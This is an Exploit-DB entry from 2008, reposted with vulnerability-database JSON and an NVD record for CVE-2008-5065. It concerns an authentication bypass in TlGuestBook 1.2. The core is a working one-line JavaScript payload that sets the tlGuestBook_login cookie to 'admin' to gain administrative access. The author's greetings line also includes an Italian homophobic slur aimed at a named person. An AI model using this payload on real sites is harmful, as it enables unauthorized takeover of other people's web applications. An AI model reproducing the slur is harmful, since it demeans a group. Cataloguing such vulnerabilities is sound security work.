ID EDB-ID:6860Type exploitdbReporter x0rModified 2008-10-28T00:00:00
Description
TlGuestBook 1.2 Insecure Cookie Handling Vulnerability. CVE-2008-5065. Webapps exploit for php platform
-========================================-
Autore: x0r
Email: evolutionteam.x0 [at] gmail.com
Cms: TlGuestBook v 1.2
Bug: Insecure Cookie Handling Vulnerability
Cms Download: http://www.easy-script.com/scripts-dl/tlguestb-12.zip
-========================================-
Exploit:
javascript:document.cookie = "tlGuestBook_login=admin; path=/"
Greetz to: Alla mia Bimb4...Margherita ti amo...E Anche A Quel Frocio Di
Andrea ( HaveStyle), str0ke :P
^^'' p0wn3d Beby.
-=EOF=-
# milw0rm.com [2008-10-28]
{"id": "EDB-ID:6860", "type": "exploitdb", "bulletinFamily": "exploit", "title": "TlGuestBook 1.2 Insecure Cookie Handling Vulnerability", "description": "TlGuestBook 1.2 Insecure Cookie Handling Vulnerability. CVE-2008-5065. Webapps exploit for php platform", "published": "2008-10-28T00:00:00", "modified": "2008-10-28T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6860/", "reporter": "x0r", "references": [], "cvelist": ["CVE-2008-5065"], "lastseen": "2016-02-01T00:49:46", "viewCount": 5, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-02-01T00:49:46", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5065"]}], "modified": "2016-02-01T00:49:46", "rev": 2}, "vulnersScore": 7.2}, "sourceHref": "https://www.exploit-db.com/download/6860/", "sourceData": "-========================================-\nAutore: x0r\nEmail: evolutionteam.x0 [at] gmail.com\nCms: TlGuestBook v 1.2\nBug: Insecure Cookie Handling Vulnerability\nCms Download: http://www.easy-script.com/scripts-dl/tlguestb-12.zip\n-========================================-\n\nExploit:\n\njavascript:document.cookie = \"tlGuestBook_login=admin; path=/\"\n\nGreetz to: Alla mia Bimb4...Margherita ti amo...E Anche A Quel Frocio Di\nAndrea ( HaveStyle), str0ke :P\n\n^^'' p0wn3d Beby.\n\n-=EOF=-\n\n# milw0rm.com [2008-10-28]\n", "osvdbidlist": ["49857"]}
{"cve": [{"lastseen": "2020-10-03T11:51:03", "description": "TlGuestBook 1.2 allows remote attackers to bypass authentication and gain administrative access by setting the tlGuestBook_login cookie to admin.", "edition": 3, "cvss3": {}, "published": "2008-11-13T17:24:00", "title": "CVE-2008-5065", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2008-5065"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:easy-script:tlguesbook:1.2"], "id": "CVE-2008-5065", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5065", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:easy-script:tlguesbook:1.2:*:*:*:*:*:*:*"]}]}
